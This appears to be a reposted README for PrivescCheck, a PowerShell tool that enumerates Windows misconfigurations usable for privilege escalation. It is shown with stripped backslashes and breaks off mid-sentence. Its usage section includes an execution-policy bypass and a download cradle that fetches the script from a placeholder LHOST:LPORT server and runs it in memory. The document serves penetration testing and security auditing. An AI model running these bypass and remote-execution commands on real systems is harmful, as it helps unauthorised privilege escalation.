image
This script aims to enumerate common Windows security misconfigurations which can be leveraged for privilege escalation and gather various information which might be useful for exploitation and/or post-exploitation . I built on the amazing work done by @harmj0y and @mattifestation in PowerUp . I added more checks and also tried to reduce the amount of false positives. It's still a Work-in-Progress because there are a few more checks I want to implement but it's already quite complete. If you have any suggestion (improvements, features), feel free to contact me on Twitter @itm4n . Usage Use the script from a PowerShell prompt. PS C:Temp> Set-ExecutionPolicy Bypass -Scope Process -Force PS C:Temp> . .Invoke-PrivescCheck.ps1; Invoke-PrivescCheck Display output and write to a log file at the same time. PS C:Temp> . .Invoke-PrivescCheck.ps1; Invoke-PrivescCheck | Tee-Object "C:Tempresult.txt" Use the script from a CMD prompt. C:Temp>powershell -ep bypass -c ". .Invoke-PrivescCheck.ps1; Invoke-PrivescCheck" Import the script from a web server. C:Temp>powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://LHOST:LPORT/Invoke-PrivescCheck.ps1'); Invoke-PrivescCheck" Yet another Windows Privilege escalation tool, why? I really like PowerUp because it can enumerate common vulnerabilities very quickly and without using any third-party tools. The problem is that it hasn't been updated for several years now. The…

Source